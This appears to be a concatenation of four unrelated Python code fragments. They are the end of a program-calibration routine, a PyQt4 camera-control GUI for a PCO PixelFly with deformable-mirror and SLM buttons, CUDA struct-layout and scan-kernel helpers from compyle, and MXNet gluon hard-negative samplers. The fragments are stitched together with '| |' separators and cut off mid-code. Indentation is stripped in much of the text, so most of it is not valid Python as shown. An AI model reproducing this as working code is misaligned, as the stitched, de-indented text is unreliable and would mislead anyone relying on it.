ck.out('### Calibration: time='+str(exec_time)+'; CT_REPEAT_MAIN='+str(orepeat)+'; new CT_REPEAT_MAIN='+str(repeat))
if cn>=cn_max:
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']='calibration failed'
if o=='con':
ck.out('')
ck.out('Program execution likely failed ('+misc['fail_reason']+')!')
ck.out('')
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
cn+=1
if sc!='yes' and repeat!=-1 and 'CT_REPEAT_MAIN' in run_vars:
if calibrate_success==False:
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']='calibration problem'
if o=='con':
ck.out('')
ck.out('Program execution likely failed ('+misc['fail_reason']+')!')
ck.out('')
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
xrepeat=repeat
if xrepeat<1: xrepeat=1
ccc['return_code']=rx
ccc['execution_time']=exec_time/abs(repeat)
ccc['total_execution_time']=exec_time
ccc['repeat']=xrepeat
misc['calibration_success']=calibrate_success
if rry==8:
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']=ry['error']
ccc['run_success']='no'
ccc['run_success_bool']=False
ccc['fail_reason']=ry['error']
if rx>0 and vcmd.get('ignore_return_code','').lower()!='yes':
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']='return code '+str(rx)+' !=0 '
ccc['run_success']='no'
ccc['run_success_bool']=False
ccc['fail_reason']='return code '+str(rx)+' !=0 '
else:
misc['run_success']='yes'
misc['run_success_bool']=True
ccc['run_success']='yes'
ccc['run_success_bool']=True
ccc['execution_time_with_module']=time.time()-start_time
# Check output correctness, if needed | |
__author__ = '<NAME>'
from PyQt4 import QtCore, QtGui
from core.pco_definitions import PixelFly
from threading import Thread
import os, time, sys, pickle
import pyqtgraph as pg
from astropy.io import fits
import numpy as np
import matlab.engine
from queue import Empty
import pygame, os, time, pickle
import win32api
class CameraWidget(QtGui.QWidget):
"""
The CameraWidget class provides the user interface for the PCO PixelFly camera. It bases the connection to the
camera through the pyPCOPixelFly.pco_definitions module. The basic framework of the class is PyQt4 an wrapper of the
Qt framework and the pyqtgraph (url-here) module is essential for the use of this user interface.
Dependencies:
-- SC2_Cam.dll : the dynamic library that interfaces the camera hardware (please contain it in the same folder as
the file).
-- (Optional) App.ico : the application icon of pco (also needs to be in the same directory).
Basic usage:
Shortcuts:
-- Ctrl + Q : Quits application
-- Ctrl + R :Resets original scale to image
Contact: <NAME>, <EMAIL>
"""
def __init__(self, parent=None):
    """Initialise widget state, the camera interface and the background colour."""
    QtGui.QWidget.__init__(self, parent)
    # directory of the running application; doubles as the default save location
    self.path = os.path.dirname(os.path.realpath("__file__"))
    self.save_dir = self.path
    # hardware interface to the PCO PixelFly (expects SC2_Cam.dll beside this file)
    self.camera = PixelFly(self.path)
    # connection / acquisition state flags
    self.connected = False
    self.alive = False
    self.live_view_bool = False
    # current exposure-time unit multiplier and the unit-name lookup table
    self.u = 1
    self.time_unit_dict = {"us": 1, "ms": 2}
    # persisted UI settings (exposure presets, ROI geometry, ...)
    self.save_settings = self.load_settings()
    # paint the widget background dark gray
    self.setAutoFillBackground(True)
    palette = self.palette()
    palette.setColor(self.backgroundRole(), QtCore.Qt.darkGray)
    self.setPalette(palette)
def create_gui(self, MainWindow):
"""
Creates user interface. Initializes all widgets of the application.
:param MainWindow: The Main Application Window -> QtGui.MainWindow()
:return:
"""
# central widget of the Main Window
self.central_widget = QtGui.QWidget(MainWindow)
# set background color to dark gray
self.central_widget.setAutoFillBackground(True)
p = self.central_widget.palette()
p.setColor(self.central_widget.backgroundRole(), QtCore.Qt.darkGray)
self.central_widget.setPalette(p)
# Grid layout to place all widgets
self.widget_layout = QtGui.QGridLayout()
# Graphics Layout Widget to put the image and histogram
self.gw = pg.GraphicsLayoutWidget()
# make margins around image items zero
self.gw.ci.layout.setContentsMargins(0,0,0,0)
# Graphics Layout Widget to put the crosscut curve plot
self.gw_crosscut = pg.GraphicsLayoutWidget()
MainWindow.setCentralWidget(self.central_widget)
# the controls_layout contains all controls of the camera (eg. connection, exposure time, recording..)
self.controls_layout = QtGui.QGridLayout()
self.controls_layout.setSpacing(20) # set spacing between widgets to 20 pixels
# indicators_layout contains all indicators of the camera feed
# The maximum count, the average count in the ROI region, buttons for ROI and crosscut, as well as
# controls of the gray values if the image.
self.indicators_layout = QtGui.QGridLayout()
# ==============================================================================================================
# CONTROL BUTTONS
# ==============================================================================================================
# Button to connect to the camera. Will turn red and display disconnect if it successfully connects.
self.ConnectBtn = QtGui.QPushButton('CONNECT')
self.controls_layout.addWidget(self.ConnectBtn, 0, 0)
# layout for exposure time controls
self.exsposure_time_layout = QtGui.QGridLayout()
self.controls_layout.addItem(self.exsposure_time_layout, 2, 0, 4, 5)
# 6 preset values of exposure time. They will be saved and reloaded through a python pickle file.
preset_values = self.save_settings['exposure times']
time_label1 = QtGui.QLabel("1")
time_label2 = QtGui.QLabel("2")
time_label3 = QtGui.QLabel("3")
time_label4 = QtGui.QLabel("4")
time_label5 = QtGui.QLabel("5")
time_label6 = QtGui.QLabel("6")
self.exp_time1 = QtGui.QPushButton(preset_values[0])
self.exp_time2 = QtGui.QPushButton(preset_values[1])
self.exp_time3 = QtGui.QPushButton(preset_values[2])
self.exp_time4 = QtGui.QPushButton(preset_values[3])
self.exp_time5 = QtGui.QPushButton(preset_values[4])
self.exp_time6 = QtGui.QPushButton(preset_values[5])
exposure_frame_title = QtGui.QLabel("Exposure time controls")
self.exsposure_time_layout.addWidget(exposure_frame_title, 0, 0, 1, 3)
self.exsposure_time_layout.addWidget(time_label1, 1, 0, 1, 1)
self.exsposure_time_layout.addWidget(time_label2, 2, 0, 1, 1)
self.exsposure_time_layout.addWidget(time_label3, 3, 0, 1, 1)
self.exsposure_time_layout.addWidget(time_label4, 1, 2, 1, 1)
self.exsposure_time_layout.addWidget(time_label5, 2, 2, 1, 1)
self.exsposure_time_layout.addWidget(time_label6, 3, 2, 1, 1)
self.exsposure_time_layout.addWidget(self.exp_time1, 1,1, 1, 1)
self.exsposure_time_layout.addWidget(self.exp_time2, 2,1, 1, 1)
self.exsposure_time_layout.addWidget(self.exp_time3, 3,1, 1, 1)
self.exsposure_time_layout.addWidget(self.exp_time4, 1,3, 1, 1)
self.exsposure_time_layout.addWidget(self.exp_time5, 2,3, 1, 1)
self.exsposure_time_layout.addWidget(self.exp_time6, 3,3, 1, 1)
# Edit line widget to input exposure time. It accepts us and ms units with the option of setting a float for
# the ms time unit (eg. 1.5 ms)
self.exp_time_in = QtGui.QLineEdit()
# time units list
self.time_units = QtGui.QComboBox()
# save the time in one of the preset values.
self.save_time = QtGui.QComboBox()
self.exsposure_time_layout.addWidget(self.exp_time_in, 4, 2, 1, 3)
self.exsposure_time_layout.addWidget(self.time_units, 4, 5, 1, 2)
self.exsposure_time_layout.addWidget(self.save_time, 4, 0, 1, 2)
# layout to host the recording controls
self.recording_layout = QtGui.QGridLayout()
self.controls_layout.addItem(self.recording_layout, 6, 0, 3, 3)
recording_label = QtGui.QLabel("Recording controls")
self.recording_layout.addWidget(recording_label, 0, 0, 1, 3)
# Live button puts the camera in live view. Has to be stopped before exiting.
self.LiveBtn = QtGui.QPushButton('LIVE')
# Records the specified number of frames and lets the user name the file while adding 000x at the end
# of the file name in FITS data format.
self.RecordBtn = QtGui.QPushButton('RECORD')
# stops live view/recording and disarms the camera
self.StopBtn = QtGui.QPushButton('STOP')
# Label for number of frames to save
frame_lab = QtGui.QLabel('# frames to record:')
# Edit line that accepts integers of the number of frames to save.
self.FramesLab = QtGui.QLineEdit()
self.recording_layout.addWidget(self.LiveBtn, 1, 0, 1, 1)
self.recording_layout.addWidget(self.RecordBtn, 1, 1, 1, 1)
#self.recording_layout.addWidget(self.StopBtn, 2, 0)
self.recording_layout.addWidget(frame_lab, 2, 0, 1, 1)
self.recording_layout.addWidget(self.FramesLab, 2, 1)
# Callbacks for all the control buttons
self.exp_time1.clicked.connect(self.exp_time_callback)
self.exp_time2.clicked.connect(self.exp_time_callback)
self.exp_time3.clicked.connect(self.exp_time_callback)
self.exp_time4.clicked.connect(self.exp_time_callback)
self.exp_time5.clicked.connect(self.exp_time_callback)
self.exp_time6.released.connect(self.exp_time_callback)
self.exp_time_list = [self.exp_time1, self.exp_time2, self.exp_time3, self.exp_time4,
self.exp_time5, self.exp_time6]
# Add list options for time unit and save buttons.
self.time_units.addItem("us")
self.time_units.addItem("ms")
self.time_units.activated[str].connect(self.onActivatedUnits)
self.save_time.addItem("Save in")
self.save_time.addItem("1")
self.save_time.addItem("2")
self.save_time.addItem("3")
self.save_time.addItem("4")
self.save_time.addItem("5")
self.save_time.addItem("6")
self.save_time.activated[str].connect(self.onActivatedSave)
# Connect Enter/Return key press with callback for setting the exposure time.
self.exp_time_in.returnPressed.connect(self.onReturnPress)
# Connect callbacks for connect, live and stop buttons
self.ConnectBtn.clicked.connect(self.connect_camera)
self.ConnectBtn.setStyleSheet("background-color: darkCyan")
self.FramesLab.setText('20')
self.LiveBtn.clicked.connect(self.live_callback)
#self.StopBtn.clicked.connect(self.stop_callback)
self.RecordBtn.clicked.connect(self.record_callback)
# layout to host the response matrix m
self.ReponseMatrix_layout = QtGui.QGridLayout()
self.controls_layout.addItem(self.ReponseMatrix_layout, 15, 0, 3, 3)
# to start DM
self.openDM_Btn = QtGui.QPushButton('open DM')
# for response matrix
self.ReponseMatrix_Btn = QtGui.QPushButton('RESPONSE MATRIX')
# to close the DM after measurement
self.closeDM_Btn = QtGui.QPushButton('close DM')
# for the Zernike coefficient
Enter_ZAmplitude = QtGui.QLabel("Amplitude:")
self.Zernike_coef = QtGui.QLineEdit()
self.Zernike_coef.setText("5")
self.ReponseMatrix_layout.addWidget(Enter_ZAmplitude, 1, 0)
self.ReponseMatrix_layout.addWidget(self.Zernike_coef, 1, 1)
self.ReponseMatrix_layout.addWidget(self.ReponseMatrix_Btn, 3, 0)
self.ReponseMatrix_layout.addWidget(self.closeDM_Btn, 2, 1)
self.ReponseMatrix_layout.addWidget(self.openDM_Btn, 2, 0)
self.ReponseMatrix_Btn.clicked.connect(self.Measure_ResponseMatrix)
self.openDM_Btn.clicked.connect(self.open_DM)
self.closeDM_Btn.clicked.connect(self.close_DM)
# layout to host the SLM
self.SLM_layout = QtGui.QGridLayout()
self.controls_layout.addItem(self.SLM_layout, 10, 0, 3, 3)
#to start DM
self.activateSLM_Btn = QtGui.QPushButton('Initialize SLM')
# to close the DM after measurement
# self.closeSLM_Btn = QtGui.QPushButton('close SLM')
# to create the phase map
#self.createSLM_Btn = QtGui.QPushButton('create')
# for the Zernike coefficient
Enter_IoverD = QtGui.QLabel("file:")
#self.Enter_IoverD .setText("D:\Xin LU\\real response matrix\\11X11\\Phase_shift_")
self.file_address = QtGui.QLineEdit()
self.file_address .setText("D:\Xin LU\\real response matrix\\9X9\\phase13_")
self.SLM_layout.addWidget(Enter_IoverD, 1, 0)
self.SLM_layout.addWidget(self.file_address , 1, 1)
self.SLM_layout.addWidget(self.activateSLM_Btn, 2, 0)
self.activateSLM_Btn.clicked.connect(self.activate_SLM)
#self.closeSLM_Btn.clicked.connect(self.close_SLM)
# ==============================================================================================================
# IMAGE OPTIONS AND HANDLES
# ==============================================================================================================
# vb is a viewbox that contains the image item.
self.vb = pg.ViewBox()
# add the view box to the graphics layout
self.gw.addItem(self.vb)
# set the aspect while scaling to be locked, i.e. both axis scale the same.
self.vb.setAspectLocked(lock=True, ratio=1)
# invert Y axis -> PyQt <-> Numpy arrays convention
self.vb.invertY()
# Image Item is the image displaying item. Has a lot of options and the user can zoom in/out by pressing the
# right mouse button and moving the mouse up/down. Furthermore by going over the image with the mouse will
# indicate the coordinates and value.
self.image = pg.ImageItem()
self.vb.addItem(self.image)
# Histogram of the displayed image. User can move the histogram axis and the gray values.
self.hist = pg.HistogramLUTItem(self.image, fillHistogram=False)
self.gw.addItem(self.hist)
# initialize image container variable
self.im = np.zeros((1392, 1040))
# set image to display
self.image.setImage(self.im)
# set initial gray levels
self.image.setLevels([200, 16383])
self.hist.setHistogramRange(200, 16383)
# Region Of Interest(ROI) widget that allows user to define a rectangle of tje image and the average count
# within this will be displayed.
#self.save_settings['ROI position']= ()
self.roi = pg.ROI(pos=self.save_settings['ROI position'], size=self.save_settings['ROI size'])
self.roi.addScaleHandle([1, 1], [0, 0])
self.roi.alive = False
self.vb.addItem(self.roi)
self.roi.hide()
# User can define line and place it on the image and the values profile will be plotted on the crosscut
# graphics layout.
self.line_roi = pg.LineSegmentROI([[680, 520], [720, 520]], pen='r')
self.vb.addItem(self.line_roi)
self.line_roi.hide()
self.line_roi.alive = False
# plot item to contain the crosscut curve
crosscut_plot = pg.PlotItem()
# crosscut curve that plot the data of the line
self.crosscut_curve = pg.PlotCurveItem()
self.gw_crosscut.addItem(crosscut_plot)
crosscut_plot.addItem(self.crosscut_curve)
self.gw_crosscut.hide()
self.gw_crosscut.setFixedWidth(800)
self.gw_crosscut.setFixedHeight(200)
# make viewbox accept mouse hover events
self.vb.acceptHoverEvents()
# connect mouse moving event to callback
self.vb.scene().sigMouseMoved.connect(self.mouseMoved)
self.x, self.y = 0, 0 # mouse position
# connect Ctrl + R key sequence to resetting the image to its original scale
shortcut = QtGui.QShortcut(QtGui.QKeySequence('Ctrl+R'), MainWindow)
shortcut.activated.connect(self.refresh_image)
reset_btn = QtGui.QPushButton('Reset zoom')
reset_btn.clicked.connect(self.refresh_image)
# checkbox enabling log scale
self.log_scale = QtGui.QCheckBox("Log scale")
self.log_scale.stateChanged.connect(self.log_scale_callback)
self.widget_layout.addWidget(self.gw, 0, 0, 6, 8)
self.widget_layout.addWidget(self.gw_crosscut, 6, 3, 2, 6)
self.widget_layout.addItem(self.controls_layout, 1, | |
<filename>compyle/cuda.py
"""Common CUDA related functionality.
"""
from __future__ import print_function
from pytools import Record, RecordWithoutPickling
import logging
from pytools.persistent_dict import KeyBuilder as KeyBuilderBase
from pytools.persistent_dict import WriteOncePersistentDict
from pycuda._cluda import CLUDA_PREAMBLE
import pycuda._mymako as mako
from pycuda.tools import (dtype_to_ctype, bitlog2,
context_dependent_memoize, ScalarArg, VectorArg)
import pycuda.gpuarray as gpuarray
from compyle.thrust.sort import argsort
import pycuda.driver as drv
from pycuda.compiler import SourceModule as _SourceModule
from pycuda.tools import dtype_to_ctype
from pytools import memoize
import numpy as np
import six
# Tracks whether a CUDA context has already been created for this process.
_cuda_ctx = False


def set_context():
    """Create the global CUDA context exactly once (idempotent)."""
    global _cuda_ctx
    if _cuda_ctx:
        return
    # importing pycuda.autoinit creates and activates the context
    import pycuda.autoinit  # noqa: F401
    _cuda_ctx = True
# The following code is taken from pyopencl for struct mapping.
# it should be ported over to pycuda eventually.
import pycuda.gpuarray as gpuarray # noqa
class SourceModule(_SourceModule):
    """SourceModule whose compiled kernels are reachable as attributes.

    ``mod.some_kernel(...)`` looks up the compiled function via
    ``get_function`` at call time and invokes it, removing the need for an
    explicit ``mod.get_function('some_kernel')`` at every call site.
    """

    def __getattr__(self, name):
        def _invoke(*args, **kwargs):
            return self.get_function(name)(*args, **kwargs)

        # expose the kernel name on the wrapper for introspection
        _invoke.function_name = name
        return _invoke
class _CDeclList:
    """Accumulates C struct declarations mirroring numpy record dtypes.

    Each record ("V"-kind) dtype encountered is translated once to a C
    declaration via ``match_dtype_to_c_struct``; seeing any complex dtype
    triggers inclusion of the pycuda complex header in the output.
    """

    def __init__(self, device):
        self.device = device
        self.declared_dtypes = set()
        self.declarations = []
        self.saw_complex = False

    def add_dtype(self, dtype):
        """Register *dtype*, recursing into the fields of record dtypes."""
        dtype = np.dtype(dtype)

        if dtype.kind == "c":
            self.saw_complex = True

        # only record (struct) dtypes need an explicit C declaration
        if dtype.kind != "V":
            return
        if dtype in self.declared_dtypes:
            return

        # declare nested field types before the enclosing struct
        for _, field_data in sorted(six.iteritems(dtype.fields)):
            self.add_dtype(field_data[0])

        _, cdecl = match_dtype_to_c_struct(
            self.device, dtype_to_ctype(dtype), dtype)

        self.declarations.append(cdecl)
        self.declared_dtypes.add(dtype)

    def visit_arguments(self, arguments):
        """Scan kernel *arguments*, noting whether any dtype is complex."""
        for arg in arguments:
            if arg.dtype.kind == "c":
                self.saw_complex = True

    def get_declarations(self):
        """Return all collected declarations as a single source fragment."""
        result = "\n\n".join(self.declarations)
        if self.saw_complex:
            result = "#include <pycuda-complex.h>\n\n" + result
        return result
@memoize
def match_dtype_to_c_struct(device, name, dtype, context=None, use_typedef=False):
    """Return a tuple `(dtype, c_decl)` such that the C struct declaration
    in `c_decl` and the structure :class:`numpy.dtype` instance `dtype`
    have the same memory layout.

    Note that *dtype* may be modified from the value that was passed in,
    for example to insert padding.

    (As a remark on implementation, this routine runs a small kernel on
    the given *device* to ensure that :mod:`numpy` and C offsets and
    sizes match.)

    This example explains the use of this function::

        >>> import numpy as np
        >>> import pyopencl as cl
        >>> import pyopencl.tools
        >>> ctx = cl.create_some_context()
        >>> dtype = np.dtype([("id", np.uint32), ("value", np.float32)])
        >>> dtype, c_decl = pyopencl.tools.match_dtype_to_c_struct(
        ...     ctx.devices[0], 'id_val', dtype)
        >>> print(c_decl)
        typedef struct {
            unsigned id;
            float value;
        } id_val;
        >>> print(dtype)
        [('id', '<u4'), ('value', '<f4')]
        >>> cl.tools.get_or_register_dtype('id_val', dtype)

    As this example shows, it is important to call
    :func:`get_or_register_dtype` on the modified `dtype` returned by this
    function, not the original one.
    """
    # Process fields in order of increasing byte offset, regardless of the
    # (unordered) dict order of dtype.fields.
    fields = sorted(
        six.iteritems(dtype.fields),
        key=lambda name_dtype_offset: name_dtype_offset[1][1]
    )

    # Build the C declaration of the struct itself.
    c_fields = []
    for field_name, dtype_and_offset in fields:
        # dtype.fields values may be 2- or 3-tuples (the third entry is a
        # title); only the first two matter here.
        field_dtype, offset = dtype_and_offset[:2]
        c_fields.append(" %s %s;" % (dtype_to_ctype(field_dtype), field_name))
    if use_typedef:
        c_decl = "typedef struct {\n%s\n} %s;\n\n" % (
            "\n".join(c_fields), name
        )
    else:
        c_decl = "struct %s {\n%s\n};\n\n" % (
            name, "\n".join(c_fields)
        )

    # Declarations for any nested struct types referenced by the fields.
    cdl = _CDeclList(device)
    for field_name, dtype_and_offset in fields:
        field_dtype, offset = dtype_and_offset[:2]
        cdl.add_dtype(field_dtype)
    pre_decls = cdl.get_declarations()

    # Kernel that reports sizeof(struct) in result[0] and each field's
    # offsetof() in result[1:].
    offset_code = "\n".join(
        "result[%d] = pycuda_offsetof(%s, %s);" % (i + 1, name, field_name)
        for i, (field_name, _) in enumerate(fields))
    src = r"""
    #define pycuda_offsetof(st, m) \
             ((uint) ((char *) &(dummy_pycuda.m) \
                     - (char *)&dummy_pycuda ))

    %(pre_decls)s
    %(my_decl)s

    extern "C" __global__ void get_size_and_offsets(uint *result)
    {
        result[0] = sizeof(%(my_type)s);
        %(my_type)s dummy_pycuda;
        %(offset_code)s
    }
    """ % dict(
        pre_decls=pre_decls,
        my_decl=c_decl,
        my_type=name,
        offset_code=offset_code)

    prg = SourceModule(src)
    knl = prg.get_size_and_offsets

    result_buf = gpuarray.empty(1 + len(fields), np.uint32)
    e = drv.Event()
    knl(result_buf.gpudata, block=(1, 1, 1))
    e.record()
    e.synchronize()
    size_and_offsets = result_buf.get()
    size = int(size_and_offsets[0])

    offsets = size_and_offsets[1:]
    if any(ofs >= size for ofs in offsets):
        # offsets not plausible
        if dtype.itemsize == size:
            # If sizes match, use numpy's idea of the offsets.
            offsets = [dtype_and_offset[1]
                       for field_name, dtype_and_offset in fields]
        else:
            raise RuntimeError(
                "OpenCL compiler reported offsetof() past sizeof() "
                "for struct layout on '%s'. "
                "This makes no sense, and it's usually indicates a "
                "compiler bug. "
                "Refusing to discover struct layout." % device)

    del knl
    del prg
    del context

    try:
        dtype_arg_dict = {
            'names': [field_name
                      for field_name, (field_dtype, offset) in fields],
            'formats': [field_dtype
                        for field_name, (field_dtype, offset) in fields],
            'offsets': [int(x) for x in offsets],
            'itemsize': int(size_and_offsets[0]),
        }
        dtype = np.dtype(dtype_arg_dict)
        if dtype.itemsize != size_and_offsets[0]:
            # "Old" versions of numpy (1.6.x?) silently ignore "itemsize". Boo.
            dtype_arg_dict["names"].append("_pycl_size_fixer")
            dtype_arg_dict["formats"].append(np.uint8)
            dtype_arg_dict["offsets"].append(int(size_and_offsets[0]) - 1)
            dtype = np.dtype(dtype_arg_dict)
    except NotImplementedError:
        # Fallback for numpy versions without offset/itemsize support:
        # emit explicit void padding fields between real fields.
        def calc_field_type():
            total_size = 0
            padding_count = 0
            for offset, (field_name, (field_dtype, _)) in zip(offsets, fields):
                if offset > total_size:
                    padding_count += 1
                    # BUG FIX: the padding width must be (offset - total_size);
                    # '%' binds tighter than '-', so the original
                    # 'V%d' % offset - total_size computed a str-minus-int
                    # and raised TypeError.
                    yield ('__pycuda_padding%d' % padding_count,
                           'V%d' % (offset - total_size))
                yield field_name, field_dtype
                total_size = field_dtype.itemsize + offset
        dtype = np.dtype(list(calc_field_type()))

    assert dtype.itemsize == size_and_offsets[0]

    return dtype, c_decl
@memoize
def dtype_to_c_struct(device, dtype):
    """Return the C struct declaration matching *dtype*, or ``""``.

    Non-struct dtypes and built-in vector types need no declaration and
    yield an empty string.
    """
    if dtype.fields is None:
        return ""

    import pyopencl.cltypes
    if dtype in pyopencl.cltypes.vec_type_to_scalar_and_count:
        # Vector types are built-in; redeclaring them would clash.
        return ""

    matched_dtype, c_decl = match_dtype_to_c_struct(
        device, dtype_to_ctype(dtype), dtype)

    def dtypes_match():
        # Sanity check: the layout-matched dtype must describe exactly the
        # same fields as the one we were handed.
        if len(dtype.fields) != len(matched_dtype.fields):
            return False
        return all(matched_dtype.fields[fname] == fval
                   for fname, fval in six.iteritems(dtype.fields))

    assert dtypes_match()

    return c_decl
#####################################################################
# The GenericScanKernel is added here temporarily until the following
# PR is merged into PyCUDA
# https://github.com/inducer/pycuda/pull/188
#####################################################################
# Module-level logger for the scan-kernel code below.
logger = logging.getLogger(__name__)
#####################################################################
# The GenericScanKernel is added here temporarily until the following
# PR is merged into PyCUDA
# https://github.com/inducer/pycuda/pull/188
#####################################################################
def parse_arg_list(arguments):
    """Parse a list of kernel arguments.

    *arguments* may be a comma-separated list of C declarators in a string,
    a list of strings representing C declarators, or :class:`Argument`
    objects.
    """
    if isinstance(arguments, str):
        arguments = arguments.split(",")

    def _as_argument(decl):
        # Strings are C declarators; anything else is assumed to already be
        # an Argument object and is passed through untouched.
        if not isinstance(decl, str):
            return decl
        from pycuda.tools import parse_c_arg
        return parse_c_arg(decl)

    return [_as_argument(decl) for decl in arguments]
def get_arg_list_scalar_arg_dtypes(arg_types):
    """Return one entry per argument: its dtype for a :class:`ScalarArg`,
    ``None`` for a :class:`VectorArg`.

    Raises :class:`RuntimeError` on any other argument type.
    """
    def _scalar_dtype(arg_type):
        if isinstance(arg_type, ScalarArg):
            return arg_type.dtype
        if isinstance(arg_type, VectorArg):
            return None
        raise RuntimeError("arg type not understood: %s" % type(arg_type))

    return [_scalar_dtype(arg_type) for arg_type in arg_types]
def _process_code_for_macro(code):
if "//" in code:
raise RuntimeError("end-of-line comments ('//') may not be used in "
"code snippets")
return code.replace("\n", " \\\n")
class _NumpyTypesKeyBuilder(KeyBuilderBase):
    """Persistent-hash key builder that also accepts numpy scalar types."""

    def update_for_type(self, key_hash, key):
        # numpy scalar types are keyed by their (stable) class name; anything
        # else is not hashable for caching purposes.
        if not issubclass(key, np.generic):
            raise TypeError("unsupported type for persistent hash keying: %s"
                    % type(key))
        self.update_for_str(key_hash, key.__name__)
# {{{ preamble

# Mako template fragment shared by all scan kernels.  It is rendered with
# wg_size / scan_expr / input_expr / scan_dtype / index_dtype (etc.) in the
# template context and prepended to every generated kernel source.
SHARED_PREAMBLE = CLUDA_PREAMBLE + """
#define WG_SIZE ${wg_size}
#define SCAN_EXPR(a, b, across_seg_boundary) ${scan_expr}
#define INPUT_EXPR(i) (${input_expr})
%if is_segmented:
#define IS_SEG_START(i, a) (${is_segment_start_expr})
%endif
${preamble}
typedef ${dtype_to_ctype(scan_dtype)} scan_type;
typedef ${dtype_to_ctype(index_dtype)} index_type;
// NO_SEG_BOUNDARY is the largest representable integer in index_type.
// This assumption is used in code below.
#define NO_SEG_BOUNDARY ${str(np.iinfo(index_dtype).max)}
"""
# }}}
# {{{ main scan code
# Algorithm: Each work group is responsible for one contiguous
# 'interval'. There are just enough intervals to fill all compute
# units. Intervals are split into 'units'. A unit is what gets
# worked on in parallel by one work group.
#
# in index space:
# interval > unit > local-parallel > k-group
#
# (Note that there is also a transpose in here: The data is read
# with local ids along linear index order.)
#
# Each unit has two axes--the local-id axis and the k axis.
#
# unit 0:
# | | | | | | | | | | ----> lid
# | | | | | | | | | |
# | | | | | | | | | |
# | | | | | | | | | |
# | | | | | | | | | |
#
# |
# v k (fastest-moving in linear index)
#
# unit 1:
# | | | | | | | | | | ----> lid
# | | | | | | | | | |
# | | | | | | | | | |
# | | | | | | | | | |
# | | | | | | | | | |
#
# |
# v k (fastest-moving in linear index)
#
# ...
#
# At a device-global level, this is a three-phase algorithm, in
# which first each interval does its local scan, then a scan
# across intervals exchanges data globally, and the final update
# adds the exchanged sums to each interval.
#
# Exclusive scan is realized by allowing look-behind (access to the
# preceding item) in the final update, by means of a local shift.
#
# NOTE: All segment_start_in_X indices are relative to the start
# of the array.
SCAN_INTERVALS_SOURCE = SHARED_PREAMBLE + r"""
#define K ${k_group_size}
// #define DEBUG
#ifdef DEBUG
#define pycu_printf(ARGS) printf ARGS
#else
#define pycu_printf(ARGS) /* */
#endif
KERNEL
REQD_WG_SIZE(WG_SIZE, 1, 1)
void ${kernel_name}(
${argument_signature},
GLOBAL_MEM scan_type* __restrict__ partial_scan_buffer,
const index_type N,
const index_type interval_size
%if is_first_level:
, GLOBAL_MEM scan_type* __restrict__ interval_results
%endif
%if is_segmented and is_first_level:
// NO_SEG_BOUNDARY if no | |
# pylint: disable=arguments-differ, unused-argument
"""Samplers for positive/negative/ignore sample selections.
This module is used to select samples during training.
Based on different strategies, we would like to choose different number of
samples as positive, negative or ignore(don't care). The purpose is to alleviate
unbalanced training target in some circumstances.
The output of sampler is an NDArray of the same shape as the matching results.
Note: 1 for positive, -1 for negative, 0 for ignore.
"""
from __future__ import absolute_import
import random
import numpy as np
import mxnet as mx
from mxnet import gluon
from mxnet import nd
from mxnet.gluon.data import Sampler
class NaiveSampler(gluon.HybridBlock):
    """A naive sampler that takes all existing matching results.

    There is no ignored sample in this case.
    """
    def __init__(self):
        super(NaiveSampler, self).__init__()

    def hybrid_forward(self, F, x):
        """Map matched entries (x >= 0) to 1 and everything else to -1."""
        pos = F.ones_like(x)
        neg = pos * -1
        return F.where(x >= 0, pos, neg)
class OHEMSampler(gluon.Block):
    """A sampler implementing Online Hard-negative mining.
    As described in paper https://arxiv.org/abs/1604.03540.
    Parameters
    ----------
    ratio : float
        Ratio of negative vs. positive samples. Values >= 1.0 is recommended.
    min_samples : int, default 0
        Minimum samples to be selected regardless of positive samples.
        For example, if positive samples is 0, we sometimes still want some num_negative
        samples to be selected.
    thresh : float, default 0.5
        IOU overlap threshold of selected negative samples. IOU must not exceed
        this threshold such that good matching anchors won't be selected as
        negative samples.
    """
    def __init__(self, ratio, min_samples=0, thresh=0.5):
        super(OHEMSampler, self).__init__()
        assert ratio > 0, "OHEMSampler ratio must > 0, {} given".format(ratio)
        self._ratio = ratio          # negative:positive sampling ratio
        self._min_samples = min_samples  # floor on number of negatives
        self._thresh = thresh        # IOU above this disqualifies a negative
    # pylint: disable=arguments-differ
    def forward(self, x, logits, ious):
        """Select all positives plus the hardest negatives.

        ``x`` is a (B, N) matching result (>= 0 means matched/positive,
        -1 unmatched); ``logits`` is (B, N, C) class predictions with
        channel 0 as background; ``ious`` is (B, N) or (B, N, M) overlaps.
        Returns a (B, N) array: 1 positive, -1 selected negative, 0 ignore.
        """
        F = nd
        # Per-image positive count drives the per-image negative quota,
        # clamped between min_samples and the remaining slots.
        num_positive = F.sum(x > -1, axis=1)
        num_negative = self._ratio * num_positive
        num_total = x.shape[1]  # scalar
        num_negative = F.minimum(F.maximum(self._min_samples, num_negative),
                                 num_total - num_positive)
        # Background cross-entropy via the max-subtraction softmax trick;
        # a high background loss marks a hard negative.
        positive = logits.slice_axis(axis=2, begin=1, end=None)
        background = logits.slice_axis(axis=2, begin=0, end=1).reshape((0, -1))
        maxval = positive.max(axis=2)
        esum = F.exp(logits - maxval.reshape((0, 0, 1))).sum(axis=2)
        score = -F.log(F.exp(background - maxval) / esum)
        mask = F.ones_like(score) * -1
        score = F.where(x < 0, score, mask)  # mask out positive samples
        if len(ious.shape) == 3:
            # reduce (B, N, M) overlaps to the best overlap per anchor
            ious = F.max(ious, axis=2)
        score = F.where(ious < self._thresh, score, mask)  # mask out if iou is large
        # Hardest-first ordering of remaining candidates.
        argmaxs = F.argsort(score, axis=1, is_ascend=False)
        # neg number is different in each batch, using dynamic numpy operations.
        y = np.zeros(x.shape)
        y[np.where(x.asnumpy() >= 0)] = 1  # assign positive samples
        argmaxs = argmaxs.asnumpy()
        for i, num_neg in zip(range(x.shape[0]), num_negative.asnumpy().astype(np.int32)):
            indices = argmaxs[i, :num_neg]
            y[i, indices.astype(np.int32)] = -1  # assign negative samples
        return F.array(y, ctx=x.context)
class QuotaSampler(gluon.Block):
    """Sampler that handles limited quota for positive and negative samples.

    Parameters
    ----------
    num_sample : int, default is 128
        Number of samples for RCNN targets.
    pos_thresh : float, default is 0.5
        Proposal whose IOU larger than ``pos_thresh`` is regarded as positive samples.
